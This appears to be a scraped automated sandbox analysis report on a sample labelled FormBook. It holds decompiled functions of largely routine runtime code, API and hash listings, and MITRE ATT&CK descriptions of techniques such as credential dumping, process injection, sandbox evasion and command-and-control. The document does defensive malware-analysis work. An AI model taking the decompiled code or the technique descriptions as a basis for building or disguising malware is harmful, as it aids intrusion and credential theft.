Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$Open$CloseCreateDomainInitJoinObjectSingleStringUnicodeWait
String ID: Administrator$WORKGROUP$\SAM_SERVICE_STARTED
API String ID: 2455420010-1595148324
Opcode ID: d94a8dc6425631f4306639d50a8cec1c485f613e867400240cc812df0c7fa6ea
Instruction ID: 831bd9d800d75d434a4d10171849cca94106da10102893928f72afdb7624fc83
Opcode Fuzzy Hash: d94a8dc6425631f4306639d50a8cec1c485f613e867400240cc812df0c7fa6ea
Instruction Fuzzy Hash: 69215EB1D00109ABDB10CBA19D49DDFBBFDFB89B18B110065EA05F3100E7349B84EB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F11B03, Relevance: 7.6, APIs: 5, Instructions: 51
timethreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F11B03() {
				void* _v8;
				struct _FILETIME _v16;
				signed int _v20;
				union _LARGE_INTEGER _v24;
				signed int _t23;
				signed int _t36;
				signed int _t37;
				signed int _t39;

				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
				_t23 =  *0xf12004;
				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
					GetSystemTimeAsFileTime( &_v16);
					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
					_v8 = _v8 ^ GetCurrentProcessId();
					_v8 = _v8 ^ GetCurrentThreadId();
					_v8 = GetTickCount() ^ _v8 ^  &_v8;
					QueryPerformanceCounter( &_v24);
					_t36 = _v20 ^ _v24.LowPart ^ _v8;
					_t39 = _t36;
					if(_t36 == 0xbb40e64e || ( *0xf12004 & 0xffff0000) == 0) {
						_t36 = 0xbb40e64f;
						_t39 = 0xbb40e64f;
					}
					 *0xf12004 = _t39;
				}
				_t37 =  !_t36;
				 *0xf12008 = _t37;
				return _t37;
			}

0x00f11b0b
0x00f11b0f
0x00f11b13
0x00f11b26
0x00f11b30
0x00f11b3c
0x00f11b45
0x00f11b4e
0x00f11b5f
0x00f11b66
0x00f11b72
0x00f11b75
0x00f11b79
0x00f11b83
0x00f11b88
0x00f11b88
0x00f11b8a
0x00f11b8a
0x00f11b90
0x00f11b93
0x00f11b9c

APIs

GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00F11B30
GetCurrentProcessId.KERNEL32 ref: 00F11B3F
GetCurrentThreadId.KERNEL32 ref: 00F11B48
GetTickCount.KERNEL32 ref: 00F11B51
QueryPerformanceCounter.KERNEL32(?), ref: 00F11B66

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
String ID:
API String ID: 1445889803-0
Opcode ID: de1ec27f3906bfc0d91ccb16c907b60bd44cee40d344eb9d39995457b1006ef6
Instruction ID: d9634be843de38c89841640eb8082e53868f822ed7c2d86804fe9150cfeaff06
Opcode Fuzzy Hash: de1ec27f3906bfc0d91ccb16c907b60bd44cee40d344eb9d39995457b1006ef6
Instruction Fuzzy Hash: 77112871D05208EBCB10DBF8D9486DEBBF4FB4C364F52855AE505E7214E6309B40AB44

Uniqueness

Uniqueness Score: -1.00%

Function 00F11C41, Relevance: 6.0, APIs: 4, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F11C41(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				UnhandledExceptionFilter(_a4);
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}

0x00f11c48
0x00f11c51
0x00f11c6a

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000,?,00F11D77,00F11000), ref: 00F11C48
UnhandledExceptionFilter.KERNEL32(00F11D77,?,00F11D77,00F11000), ref: 00F11C51
GetCurrentProcess.KERNEL32(C0000409,?,00F11D77,00F11000), ref: 00F11C5C
TerminateProcess.KERNEL32(00000000,?,00F11D77,00F11000), ref: 00F11C63

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
String ID:
API String ID: 3231755760-0
Opcode ID: 5e772370805765711169b6d21df24578055a40ca8c37c9160d525868630ca773
Instruction ID: 22952ba6e78d7a946a9fa14b0aa9b9b9d781c46113fd5e247739e84c67e7d9dc
Opcode Fuzzy Hash: 5e772370805765711169b6d21df24578055a40ca8c37c9160d525868630ca773
Instruction Fuzzy Hash: 15D0C93200010CBBC7106BE1ED0CA993EA8EB4C65AF078400F30A82020CA318601AB61

Uniqueness

Uniqueness Score: -1.00%

Function 00F11420, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 30
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F11420() {
				long _t2;
				long _t4;
				void* _t6;
				long _t7;

				_t7 = 0;
				_t6 = OpenEventW(0x100000, 0, L"Global\\SC_AutoStartComplete");
				if(_t6 == 0) {
					_t2 = GetLastError();
					_t7 = _t2;
				} else {
					_t4 = WaitForSingleObject(_t6, 0xffffffff);
					if(_t4 == 0xffffffff) {
						_t4 = GetLastError();
						goto L5;
					} else {
						if(_t4 != 0) {
							L5:
							_t7 = _t4;
						}
					}
					CloseHandle(_t6);
				}
				return _t7;
			}

0x00f11429
0x00f11437
0x00f1143b
0x00f11462
0x00f11468
0x00f1143d
0x00f11440
0x00f11449
0x00f11451
0x00000000
0x00f1144b
0x00f1144d
0x00f11457
0x00f11457
0x00f11457
0x00f1144d
0x00f1145a
0x00f1145a
0x00f1146e

APIs

OpenEventW.KERNEL32(00100000,00000000,Global\SC_AutoStartComplete), ref: 00F11431
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00F11440
GetLastError.KERNEL32 ref: 00F11451
CloseHandle.KERNEL32(00000000), ref: 00F1145A
GetLastError.KERNEL32 ref: 00F11462

Strings

Global\SC_AutoStartComplete, xrefs: 00F11424

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$CloseEventHandleObjectOpenSingleWait
String ID: Global\SC_AutoStartComplete
API String ID: 2650214448-1494149870
Opcode ID: 53fb7d614c7c68eaa68d17f6e0a727aed575e4e1664ab599316e599dec60f361
Instruction ID: 9f1e1ebd70b590fcee0155b1554e483d00b5a8397759f61dab2ec420ba68d8dd
Opcode Fuzzy Hash: 53fb7d614c7c68eaa68d17f6e0a727aed575e4e1664ab599316e599dec60f361
Instruction Fuzzy Hash: 2FE09B329041246B426093696C0CAE77DA5FA8BFF53274315F925D22D0DF30CD81F961

Uniqueness

Uniqueness Score: -1.00%

Function 00F115C0, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F115C0() {
				signed int _t10;
				void* _t15;
				signed int _t18;
				intOrPtr _t19;
				void* _t25;

				_t25 =  *0xf10000 - 0x5a4d; // 0x5a4d
				if(_t25 == 0) {
					_t19 =  *0xf1003c; // 0xf0
					__eflags =  *((intOrPtr*)(_t19 + 0xf10000)) - 0x4550;
					if( *((intOrPtr*)(_t19 + 0xf10000)) != 0x4550) {
						goto L1;
					} else {
						_t2 = _t19 + 0xf10018; // 0xc0e010b
						_t18 =  *_t2 & 0x0000ffff;
						__eflags = _t18 - 0x10b;
						if(_t18 == 0x10b) {
							_t10 = 0;
							__eflags =  *((intOrPtr*)(_t19 + 0xf10074)) - 0xe;
							if( *((intOrPtr*)(_t19 + 0xf10074)) > 0xe) {
								__eflags =  *(_t19 + 0xf100e8);
								goto L9;
							}
						} else {
							__eflags = _t18 - 0x20b;
							if(_t18 != 0x20b) {
								goto L1;
							} else {
								_t10 = 0;
								__eflags =  *((intOrPtr*)(_t19 + 0xf10084)) - 0xe;
								if( *((intOrPtr*)(_t19 + 0xf10084)) > 0xe) {
									__eflags =  *(_t19 + 0xf100f8);
									L9:
									_t8 = __eflags != 0;
									__eflags = _t8;
									_t10 = _t10 & 0xffffff00 | _t8;
								}
							}
						}
					}
				} else {
					L1:
					_t10 = 0;
				}
				 *0xf12028 = _t10;
				__set_app_type(E00F1196E(1));
				 *0xf1235c =  *0xf1235c | 0xffffffff;
				 *0xf12360 =  *0xf12360 | 0xffffffff;
				 *(__p__fmode()) =  *0xf1203c;
				 *(__p__commode()) =  *0xf12030;
				_t15 = E00F119B0();
				if( *0xf12000 == 0) {
					__setusermatherr(E00F119B0);
				}
				E00F11B9D(_t15);
				return 0;
			}

0x00f115c5
0x00f115cc
0x00f115d2
0x00f115d8
0x00f115e2
0x00000000
0x00f115e4
0x00f115e4
0x00f115e4
0x00f115eb
0x00f115f0
0x00f1160c
0x00f1160e
0x00f11615
0x00f11617
0x00000000
0x00f11617
0x00f115f2
0x00f115f2
0x00f115f7
0x00000000
0x00f115f9
0x00f115f9
0x00f115fb
0x00f11602
0x00f11604
0x00f1161d
0x00f1161d
0x00f1161d
0x00f1161d
0x00f1161d
0x00f11602
0x00f115f7
0x00f115f0
0x00f115ce
0x00f115ce
0x00f115ce
0x00f115ce
0x00f11622
0x00f1162d
0x00f11633
0x00f1163a
0x00f1164f
0x00f1165d
0x00f1165f
0x00f1166b
0x00f11672
0x00f11678
0x00f11679
0x00f11680

APIs

__set_app_type.MSVCRT ref: 00F1162D
__p__fmode.MSVCRT ref: 00F11643
__p__commode.MSVCRT ref: 00F11651
__setusermatherr.MSVCRT ref: 00F11672

Strings

.$, xrefs: 00F1160E

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: __p__commode__p__fmode__set_app_type__setusermatherr
String ID: .$
API String ID: 1063105408-2223841709
Opcode ID: 5901050bac5ef1107d196d721bb260067085327cc511484aebe3c67aff0aadb4
Instruction ID: 2f40111d98082eab6f5386283221d8f0b5b2f8b9d1cc5938827e67bb3af6ba6c
Opcode Fuzzy Hash: 5901050bac5ef1107d196d721bb260067085327cc511484aebe3c67aff0aadb4
Instruction Fuzzy Hash: 3F113370900208CFD7649B70A84D6E437A1B748365F298A5DE6268A1E1DB7B89D5FF20

Uniqueness

Uniqueness Score: -1.00%

Function 00F11547, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00F11547() {
				void* _v8;
				int _v12;
				char _v16;
				int _v20;
				int* _t21;

				_t21 = 0;
				_v8 = 0;
				if(RegOpenKeyExW(0x80000002, L"System\\Setup", 0, 1,  &_v8) == 0) {
					_v16 = 0;
					_v20 = 4;
					_v12 = 0;
					if(RegQueryValueExW(_v8, L"Upgrade", 0,  &_v12,  &_v16,  &_v20) == 0 && _v12 == 4 && _v16 == 1) {
						_t21 = 1;
					}
					RegCloseKey(_v8);
				}
				return _t21;
			}

0x00f11553
0x00f11563
0x00f1156e
0x00f11573
0x00f1157a
0x00f11585
0x00f1159a
0x00f115a8
0x00f115a8
0x00f115ac
0x00f115ac
0x00f115b8

APIs

RegOpenKeyExW.ADVAPI32(80000002,System\Setup,00000000,00000001,?,00000000,?,00F11523), ref: 00F11566
RegQueryValueExW.ADVAPI32(?,Upgrade,00000000,?,00F11523,?), ref: 00F11592
RegCloseKey.ADVAPI32(?), ref: 00F115AC

Strings

System\Setup, xrefs: 00F11559
Upgrade, xrefs: 00F1158A

Memory Dump Source

Source File: 00000015.00000002.904400021.0000000000F11000.00000020.00020000.sdmp, Offset: 00F10000, based on PE: true

Associated: 00000015.00000002.904386841.0000000000F10000.00000002.00020000.sdmp Download File
Associated: 00000015.00000002.904412388.0000000000F13000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpenQueryValue
String ID: System\Setup$Upgrade
API String ID: 3677997916-625569356
Opcode ID: a49f3d55c776b00370aecd7715a13da0dde8605197827ec0b68dd365cb1c67b5
Instruction ID: 87fa1bd57e5ac824466a0f0920e3dff1cb1265b4cfdeb81b3c94726e3ca48732
Opcode Fuzzy Hash: a49f3d55c776b00370aecd7715a13da0dde8605197827ec0b68dd365cb1c67b5
Instruction Fuzzy Hash: 8101FFB4D4022CBBDB209B91DC49ADFBFBDFF44765F104256FA05A2100D7719B44EA91

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report f97e137e_by_Libranalysis

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Stealing of Sensitive Information:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

Function 1042984A, Relevance: 1.5, APIs: 1, Instructions: 41
filenativeCOMMON

Function 10429850, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 10429900, Relevance: 1.5, APIs: 1, Instructions: 36
filenativeCOMMON

Function 10429A30, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 1042997A, Relevance: 1.5, APIs: 1, Instructions: 21
nativeCOMMON

Function 10429980, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 104182B0, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre